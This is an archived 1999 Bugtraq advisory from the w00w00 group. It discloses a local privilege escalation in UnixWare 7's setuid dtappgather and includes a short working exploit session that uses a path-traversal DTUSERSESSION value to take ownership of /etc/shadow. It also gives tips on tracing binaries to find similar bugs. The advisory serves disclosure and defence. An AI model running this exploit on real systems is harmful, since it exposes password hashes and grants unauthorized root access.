unixware7.dtappgather.txt

`Date: Wed, 3 Nov 1999 10:51:52 -0800 (PST)  
From: Sangfroid <[email protected]>  
Subject: bugtraq post  
  
  
  
Introduction to w00giving '99  
  
RFP's most excellent 0kt0berfest commitment to working for  
everyman to make the world more secure, caused w00w00 to stop  
and give thought to our collective contribution to the world  
of computer security. Finding ourselves lacking in the past few months,  
our hearts were pricked and we were driven to repentance.  
  
Being the month of thankfulness for all we have received this year,  
w00w00 looked back and found many things to give back to the computer  
security community.  
============================================================  
To celebrate the upcoming mass-destruction and world-wide chaos in 2000,  
w00w00 Security Development (WSD) will be releasing many advisories  
depending on vendor's timely responses.  
  
The severity of each vulnerability will outweigh the previously posted  
one, so keep your eyes out!  
  
If all goes according to plan, w00giving '99 will close with its largest  
vulnerability on Jan. 1, 2000, aka w00mageddon.  
  
Note: eEye Digital Security is also participating with us to independently  
release NT tools and vulnerabilities within the next few weeks.  
  
w00w00, eEye, rfp, technotronic, wiretrip  
  
======================================================  
w00giving '99  
  
Let the games begin...  
======================================================  
  
Vendors should review available best practice guidelines on  
secure programming techniques. Should they have done so in this  
instance, they would have instantly recognized the security issue we  
discovered.  
We also understand it's much easier to audit code post-release,  
and realize the underpaid coders are pushed to market by  
marketing monkeys and management that do not represent  
secure programming techniques.  
  
MANAGER NOTE:  
======================================================  
THIS IS IMPORTANT, SORRY ABOUT THE LACK OF  
POWER POINT PRESENTATION!  
  
"GIVE YOUR CODERS MORE MONEY AND TIME!"  
======================================================  
END OF MANAGER NOTE, GO BACK TO YOUR MEETING.  
  
Note:  
All you really have to do to find bugs like this is use some  
application like strace, ktrace, or truss(depending on your  
operating environmen) and look for suspect calls.  
  
For instance, if you see a call to getenv() and then the  
value of the environment variable mysteriously showing up in an  
open() call, there is probably something wrong here.  
  
Pay strict attention, you will see this material again.  
  
  
======================================================  
  
  
  
UnixWare 7's dtappgather  
Discovered by: K2 ([email protected])  
  
UnixWare 7's dtappgather runs with superuser privileges, but improperly  
check $DTUSERSESSION to ensure that the file is readable/writeable or  
owned by the user running it.  
  
---------------------------------------------------------------------------  
Exploit:  
  
rain:/usr/dt/bin$ export DTUSERSESSION=../../../../etc/shadow  
rain:/usr/dt/bin$ ./dtappgather  
MakeDirectory: /var/dt/appconfig/appmanager/../../../../etc/shadow: File  
exists  
rain:/usr/dt/bin$ ls -la /etc/shadow  
-r-xr-xr-x 1 ktwo other 358 Oct 26 04:37 /etc/shadow*  
  
---------------------------------------------------------------------------  
Patch:  
  
Because SCO doesn't release source for UnixWare, we must wait for them to  
provide one.  
  
---------------------------------------------------------------------------  
  
Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, and  
interrupt  
People who deserve hellos: nocarrier, minus, daveg, nny, marc,  
and w00god blake  
  
w00w00 Security Development (WSD)  
[See http://www.datasurge.net/www.w00w00.org, the official mirror, until  
relocation of w00w00.org is complete]  
`